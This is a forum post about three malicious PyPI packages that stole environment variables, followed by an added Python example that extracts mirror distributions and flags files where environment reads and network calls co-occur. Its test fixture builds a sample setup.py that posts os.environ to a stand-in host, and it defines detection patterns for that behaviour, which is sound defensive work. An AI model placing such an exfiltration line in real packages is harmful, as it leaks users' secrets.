Malicious PyPI packages with over 10,000 downloads taken down

silversurfer

The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines.

These malicious packages are estimated to have generated over 10,000 downloads, mirrors included, according to the researchers' report.

This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.
"Once I had a large number of the package distributions downloaded, I needed to extract them for easier analysis. I put together a pretty simple Python script to recursively iterate through Bandersnatch’s somewhat complicated folder structure then decompressed and extracted each sdist, egg, or wheel out to a flat directory," explains the developer in his blog post.

"Once extracted I ran a number of string and regex searches using grep, then manually reviewed the results. The outcome of this simple approach was actually pretty impactful."
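The extract-then-grep workflow Scott describes (flatten the mirror's distributions, then string/regex-search them), as an added Python example that is not code from the post or from Scott's blog: it walks a Bandersnatch-style tree, extracts each sdist/wheel/egg into its own flat directory while refusing archive members that could escape it, and flags files where an environment-variable read and an outbound network call co-occur. The mirror layout, the regex patterns and the two sample distributions are constructed for the demo.

```python
import io, re, tarfile, tempfile, zipfile
from pathlib import Path

# grep-style patterns: env-var reads and outbound network calls (illustrative, not a full ruleset)
PATTERNS = {
    "env_read": re.compile(rb"os\.environ|getenv\("),
    "network": re.compile(rb"urlopen\(|requests\.(get|post)\(|socket\.connect\("),
}
def extract_all(mirror_root, out_dir):
    """Find every sdist/wheel/egg under a mirror tree and extract each into its own flat dir."""
    extracted = []
    for path in sorted(Path(mirror_root).rglob("*")):
        dest = Path(out_dir) / path.name  # one directory per distribution file
        if path.name.endswith((".tar.gz", ".tgz")):
            with tarfile.open(path) as tf:
                # tarfile does not sanitise names: keep regular files whose path cannot escape dest
                safe = [m for m in tf.getmembers() if m.isfile() and not Path(m.name).is_absolute()
                        and ".." not in Path(m.name).parts]
                kw = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}  # stdlib filter if present
                tf.extractall(dest, members=safe, **kw)
        elif path.name.endswith((".whl", ".egg", ".zip")):
            with zipfile.ZipFile(path) as zf:  # zipfile.extractall strips '..' and leading '/' itself
                zf.extractall(dest)
        else:
            continue
        extracted.append(dest)
    return extracted
def scan(dist_dirs):
    """Flag .py files in which an env-var read and a network call co-occur."""
    hits = {}
    for d in dist_dirs:
        for f in Path(d).rglob("*.py"):
            matched = {k for k, rx in PATTERNS.items() if rx.search(f.read_bytes())}
            if matched == set(PATTERNS):
                hits[f"{d.name}/{f.relative_to(d).as_posix()}"] = sorted(matched)
    return hits
def build_sample_mirror(root):  # constructed input: one suspicious sdist and one benign wheel
    pkgdir = Path(root) / "web/packages/ab/cd"; pkgdir.mkdir(parents=True)
    bad = b"import os, urllib.request\nurllib.request.urlopen('http://example.invalid', str(os.environ).encode())\n"
    with tarfile.open(pkgdir / "evilpkg-1.0.tar.gz", "w:gz") as tf:
        info = tarfile.TarInfo("evilpkg-1.0/setup.py"); info.size = len(bad)
        tf.addfile(info, io.BytesIO(bad))
    with zipfile.ZipFile(pkgdir / "goodpkg-1.0-py3-none-any.whl", "w") as zf:
        zf.writestr("goodpkg/__init__.py", "def add(a, b):\n    return a + b\n")
    return root
def demo():
    """Run the pipeline over the constructed mirror and return the findings."""
    tmp = Path(tempfile.mkdtemp())
    return scan(extract_all(build_sample_mirror(tmp / "mirror"), tmp / "flat"))
```

Only the constructed sdist's setup.py is reported; the benign wheel matches neither pattern and is left out of the findings.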